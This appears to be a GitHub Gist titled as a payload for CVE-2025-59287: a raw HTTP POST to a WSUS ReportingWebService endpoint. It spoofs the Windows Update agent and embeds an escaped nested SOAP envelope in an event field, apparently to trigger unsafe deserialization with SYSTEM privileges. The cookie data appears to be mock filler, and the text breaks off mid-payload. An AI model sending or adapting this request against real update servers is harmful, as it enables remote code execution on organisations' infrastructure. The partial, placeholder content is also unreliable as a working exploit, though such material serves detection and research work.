Skip to content

Instantly share code, notes, and snippets.

@simokohonen
Created November 7, 2025 12:04
Show Gist options
  • Select an option

  • Save simokohonen/eb854a1628509138bc4cd8992833a4d3 to your computer and use it in GitHub Desktop.

Select an option

Save simokohonen/eb854a1628509138bc4cd8992833a4d3 to your computer and use it in GitHub Desktop.
CVE-2025-59287 payload
POST /ReportingWebService/ReportingWebService.asmx HTTP/1.1
Host: [redacted]:8530
User-Agent: Windows-Update-Agent
Content-Length: 5244
Accept: text/xml
Connection: Keep-Alive
Content-Type: text/xml
SOAPAction: "http://www.microsoft.com/SoftwareDistribution/ReportEventBatch"
Accept-Encoding: gzip
Connection: close
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<ReportEventBatch xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie>
<Expiration>[2025-10-25T18:45:33.287Z 2025-10-25T14:30:00Z]</Expiration>
<EncryptedData>[kJHg8YtR3nV7wLmP5xZq2bF9sK4hQ6uT8dW1cX7yN3jE9pM5vR2nL6fH8tB4gK7sY3wQ9xV5mP2hT6uL8dN4jF7rW9cK3pY5tH8nM6vR2xQ7sL4gB9fW3hT6yJ8pN5mK2vR7xL9sE4wQ3hF6tY8nM5jP2dK7uR9cW6xL3vB8sT4gH7fY2pN9mQ5kW8jE6rL3xM7tH4vP9sY2nK6uF8dR5cW7xQ3gT9mL4pB6hJ8sY2vE7nK9rW5fM3xL6tP8sQ4uH7dY2gR9cN5jW8mK3vL6pT7xF9sB4hE8rY2nM5qW7uK3dL9pJ6xT8sF4gH7vR2mN9cY5wQ8tP3kL6hE9rB7sM4xW2nF8uJ5vK7pT3dR9gL6cY8hQ4sW7mN2xP9tE5fB8rK3vL6uH7jM9sY4wT2nQ8pF5kR7cW3xE6gL9hB4vN8mP2sT7dY5rJ9uK6wF3xL8cH4pM7tQ2vE9sB5nR8gW6yJ3hK7uF4mP9cL2xT8dN5vW7rQ3sE6kH8pM4tY9fB7gR5nJ2wL8cK6xP3vT9sM4hE7uQ2dW8fY5rN7pL3gB9kJ6cT4xH8mR2vW7sE5nQ9pF3uK8tL4yJ7cM6hP2wR9dB5xN8sT3vE7gL6fQ4kW9rH2pM8cJ5tY7uB3nL9xK4sR6vE8gW2fP7hM9dT5cQ3jL8pN4yR7sK6wB9mH2xE5tF8uL3vQ7cP4gW6rJ9nM8sT2dY5kH7pL3fB9xR4vE6cN8wQ5tJ2mK7uS9gH4pL3rW8xF6yT7sB9vE2nM5cQ8dP4hK7uJ3wL6rT9xE5gM8sN2vF4pB7cY9kH3tW6rL8uQ5dJ7xM9sP2nE4gF8hT3vK6cW7 dGhpc2lzYW1vY2tjb29raWVkYXRh]</EncryptedData>
</cookie>
<clientTime>2025-11-07T00:24:38</clientTime>
<eventBatch xmlns:q1="http://www.microsoft.com/SoftwareDistribution" soapenc:arrayType="q1:ReportingEvent[1]">
<ReportingEvent>
<BasicData>
<TargetID>
<Sid>a7f3c8e9-4d2b-4a1c-9f7e-3b8d5c6a1e2f</Sid>
</TargetID>
<SequenceNumber>0</SequenceNumber>
<TimeAtTarget>2025-11-07T00:24:38</TimeAtTarget>
<EventInstanceID>2a41cec6-a7d8-4464-b660-88bd53709d32</EventInstanceID>
<NamespaceID>2</NamespaceID>
<EventID>389</EventID>
<SourceID>301</SourceID>
<UpdateID>
<UpdateID>00000000-0000-0000-0000-000000000000</UpdateID>
<RevisionNumber>0</RevisionNumber>
</UpdateID>
<Win32HResult>0</Win32HResult>
<AppName>LocalServer</AppName>
</BasicData>
<ExtendedData>
<MiscData soapenc:arrayType="xsd:string[2]">
<string>Administrator=SYSTEM</string>
<string>SynchronizationUpdateErrorsKey=&lt;SOAP-ENV:Envelope xmlns:xsi=&#34;http://www.w3.org/2001/XMLSchema-instance&#34; xmlns:xsd=&#34;http://www.w3.org/2001/XMLSchema&#34; xmlns:SOAP-ENC=&#34;http://schemas.xmlsoap.org/soap/encoding/&#34; xmlns:SOAP-ENV=&#34;http://schemas.xmlsoap.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment